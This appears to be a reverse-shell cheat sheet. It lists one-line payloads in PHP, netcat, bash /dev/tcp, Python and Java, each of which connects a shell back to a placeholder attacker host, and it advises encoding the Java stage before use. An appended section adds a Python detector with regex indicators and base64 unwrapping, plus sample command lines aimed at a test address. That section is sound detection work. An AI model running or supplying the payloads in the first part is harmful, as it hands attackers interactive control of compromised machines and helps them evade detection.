php

```php
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
```
The method above may, in some situations, connect back and then drop immediately. The main reason is that executing the code above redirects the process's standard input and output into /bin/sh, which makes php-fpm return a 502 right away, and the spawned shell is lost the moment it appears. The following command can be used instead to spawn the reverse shell:
```php
php -r '$sock = fsockopen("ip", port);$descriptorspec = array(0 => $sock,1 => $sock,2 => $sock);$process = proc_open("/bin/sh", $descriptorspec, $pipes);proc_close($process);'
```

```php
<?php $sock=fsockopen("ip", port);exec("/bin/bash -i <&3 >&3 2>&3"); ?>
```
nc

```bash
nc -e /bin/bash [ip] [port]
```
bash

```bash
bash -i >& /dev/tcp/ip/port 0>&1
sh -i >& /dev/tcp/ip/port 0>&1
/bin/bash -i >& /dev/tcp/ip/port 0>&1
```
python

```bash
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
```
java

```java
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"});
p.waitFor();
```
Usually "/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done" is encoded before use.
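As an added example that is not part of the original page, the following Python detector flags the command-line families listed above in process-execution telemetry (auditd execve records, EDR command lines), and also unwraps base64 tokens so the "encoded before use" form of the Java stage is still caught. The sample command lines, the TEST-NET endpoint 203.0.113.5:4444 and the indicator names are constructed for this example.

```python
import base64
import re

# Constructed stage for the "encoded before use" case: the bash -c payload from the
# Java example, base64-wrapped (TEST-NET address and port, not a real endpoint).
_STAGE = b"exec 5<>/dev/tcp/203.0.113.5/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"
ENCODED_STAGE = base64.b64encode(_STAGE).decode()

# Constructed process command lines, as an auditd execve or EDR record would carry them.
SAMPLE_COMMAND_LINES = [
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "nc -e /bin/bash 203.0.113.5 4444",
    "php -r '$sock=fsockopen(\"203.0.113.5\",4444);exec(\"/bin/bash -i <&3 >&3 2>&3\");'",
    "python -c \"import os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect(('203.0.113.5',4444));os.dup2(s.fileno(),0)\"",
    "bash -c \"echo " + ENCODED_STAGE + " | base64 -d | bash\"",
    "/usr/bin/php /var/www/html/index.php",   # benign
    "nc -zv 10.0.0.1 22",                     # benign port check, no -e
]

# One regex per reverse-shell family on this page; each tolerates any host/port.
INDICATORS = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/[\w.\-]+/\d+"),
    "nc_exec_shell": re.compile(r"\bnc\b.*\s-e\s+\S*sh\b"),
    "php_socket_shell": re.compile(r"fsockopen\(.*(exec|proc_open)\("),
    "python_dup2_shell": re.compile(r"socket\.socket\(.*os\.dup2\("),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def views(cmdline):
    """Yield (text, was_decoded): the raw line, then each decodable base64 token in it."""
    yield cmdline, False
    for token in B64_TOKEN.findall(cmdline):
        try:
            yield base64.b64decode(token, validate=True).decode("utf-8", "replace"), True
        except ValueError:  # binascii.Error is a ValueError: not valid base64, skip it
            continue

def detect(cmdline):
    """Return sorted indicator names hit by one command line (raw or after decoding)."""
    hits = set()
    for text, decoded in views(cmdline):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name + (" (base64-decoded)" if decoded else ""))
    return sorted(hits)

def scan(lines):
    """Map each command line to its indicator hits; empty list means no alert."""
    return {line: detect(line) for line in lines}
```

Feed real execve or EDR command-line records into scan(); an empty hit list is a clean line, and the "(base64-decoded)" suffix tells the analyst the match came from an unwrapped token rather than the visible command.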